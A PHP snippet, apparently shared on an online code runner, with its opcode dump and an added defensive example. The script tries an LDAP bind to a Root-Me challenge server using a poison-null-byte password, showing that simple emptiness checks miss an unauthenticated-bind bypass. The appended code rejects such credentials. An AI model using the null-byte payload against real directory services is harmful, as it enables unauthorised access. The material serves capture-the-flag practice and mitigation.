<?php
$username="alex.everett@okstate.edu"; //LDAP rdn or dn
$password="\x00\x41"; //associated password (poison null byte)
// $username=$_POST['username']; //uncomment to test POST request
// $password=$_POST['password']; //uncomment to test POST request
if (!$username or !$password) {
    exit(); //typical check for no username or password
} //end check 1
if (empty($username) or empty($password)) {
    exit(); //typical check for no username or password
}//end check 2
if (is_null($username) or is_null($password)) {
    exit(); //typical check for no username or password
}//end check 3

//notice that typical checks will not prevent the attack
echo(strlen($password) . "\r\n"); //outputs the length of the string

// connect to ldap server
$ldapconn = ldap_connect("challenge01.root-me.org", "54013") //LDAP server
    or die("Could not connect to LDAP server");
if ($ldapconn) {
    // binding to ldap server
    $ldapbind = ldap_bind($ldapconn, $username, $password);
    //verify binding. Note that the complete data is not passed.
    if ($ldapbind) {
        echo "LDAP bind successful...";
    } else {
        echo "LDAP bind failed...";
    }
}
?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 4, Position 2 = 6
Branch analysis from position: 4
2 jumps found. (Code = 43) Position 1 = 7, Position 2 = 8
Branch analysis from position: 7
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 8
2 jumps found. (Code = 47) Position 1 = 10, Position 2 = 12
Branch analysis from position: 10
2 jumps found. (Code = 43) Position 1 = 13, Position 2 = 14
Branch analysis from position: 13
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 47) Position 1 = 16, Position 2 = 18
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 20
Branch analysis from position: 19
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 20
2 jumps found. (Code = 47) Position 1 = 29, Position 2 = 31
Branch analysis from position: 29
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 32, Position 2 = 42
Branch analysis from position: 32
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41
Branch analysis from position: 39
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 42
Branch analysis from position: 18
Branch analysis from position: 12
Branch analysis from position: 6
filename:       /in/gg279
function name:  (null)
number of ops:  43
compiled vars:  !0 = $username, !1 = $password, !2 = $ldapconn, !3 = $ldapbind
line      #* E I O op                           fetch          ext  return  operands
    2     0  E >   ASSIGN                                                   !0, 'alex.everett%40okstate.edu'
    3     1        ASSIGN                                                   !1, '%00A'
    6     2        BOOL_NOT                                         ~6      !0
          3      > JMPNZ_EX                                         ~6      ~6, ->6
          4    >   BOOL_NOT                                         ~7      !1
          5        BOOL                                             ~6      ~7
          6    > > JMPZ                                                     ~6, ->8
    7     7    > > EXIT                                                     
    9     8    >   ISSET_ISEMPTY_CV                                 ~8      !0
          9      > JMPNZ_EX                                         ~8      ~8, ->12
         10    >   ISSET_ISEMPTY_CV                                 ~9      !1
         11        BOOL                                             ~8      ~9
         12    > > JMPZ                                                     ~8, ->14
   10    13    > > EXIT                                                     
   12    14    >   TYPE_CHECK                                    2  ~10     !0
         15      > JMPNZ_EX                                         ~10     ~10, ->18
         16    >   TYPE_CHECK                                    2  ~11     !1
         17        BOOL                                             ~10     ~11
         18    > > JMPZ                                                     ~10, ->20
   13    19    > > EXIT                                                     
   17    20    >   STRLEN                                           ~12     !1
         21        CONCAT                                           ~13     ~12, '%0D%0A'
         22        ECHO                                                     ~13
   20    23        INIT_FCALL_BY_NAME                                       'ldap_connect'
         24        SEND_VAL_EX                                              'challenge01.root-me.org'
         25        SEND_VAL_EX                                              '54013'
         26        DO_FCALL                                      0  $14     
         27        ASSIGN                                           ~15     !2, $14
         28      > JMPNZ_EX                                         ~15     ~15, ->31
   21    29    > > EXIT                                                     'Could+not+connect+to+LDAP+server'
         30*       BOOL                                             ~15     <true>
   22    31    > > JMPZ                                                     !2, ->42
   24    32    >   INIT_FCALL_BY_NAME                                       'ldap_bind'
         33        SEND_VAR_EX                                              !2
         34        SEND_VAR_EX                                              !0
         35        SEND_VAR_EX                                              !1
         36        DO_FCALL                                      0  $16     
         37        ASSIGN                                                   !3, $16
   26    38      > JMPZ                                                     !3, ->41
   27    39    >   ECHO                                                     'LDAP+bind+successful...'
   26    40      > JMP                                                      ->42
   29    41    >   ECHO                                                     'LDAP+bind+failed...'
   32    42    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0
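An added example, not part of the original 3v4l script: a pre-bind credential check that closes the gap the three checks in the script leave open. The function names credential_is_usable() and safe_ldap_bind() are hypothetical; the check rejects any credential that contains a null byte anywhere, or that is blank once trimmed, before ldap_bind() is reached, and it runs the page's "\x00\x41" password through that check alongside a few other constructed inputs.

```php
<?php
// Added example (not the original page's code). The !/empty()/is_null()
// checks in the script above only look at PHP's view of the string; the
// risk is that a value such as "\x00\x41" is truncated at the null byte
// further down the stack and is then treated as an empty password, which
// some directory servers accept as an unauthenticated bind.

function credential_is_usable(string $value): bool
{
    // Reject null bytes anywhere in the value, not only at the start
    // (strpos is binary-safe, so it sees past the null byte).
    if (strpos($value, "\0") !== false) {
        return false;
    }
    // Reject values that are empty once whitespace is stripped.
    if (trim($value) === '') {
        return false;
    }
    return true;
}

// Hypothetical wrapper: never let a credential that could collapse to an
// empty string reach ldap_bind().
function safe_ldap_bind($conn, string $dn, string $password): bool
{
    if (!credential_is_usable($dn) || !credential_is_usable($password)) {
        return false;
    }
    return ldap_bind($conn, $dn, $password);
}

// Constructed inputs; the second one is the page's poison null byte password.
$cases = [
    'correct-horse-battery' => true,
    "\x00\x41"              => false,
    "secret\x00"            => false,
    "   "                   => false,
    ''                      => false,
];

foreach ($cases as $input => $expected) {
    $result = credential_is_usable($input);
    printf("%-24s usable=%-5s expected=%s\n",
        json_encode($input), var_export($result, true), var_export($expected, true));
    if ($result !== $expected) {
        throw new RuntimeException("unexpected result for " . json_encode($input));
    }
}
```

The client-side check only protects this one application; the directory itself should also be configured to refuse unauthenticated binds so that an empty password can never succeed regardless of which client sends it.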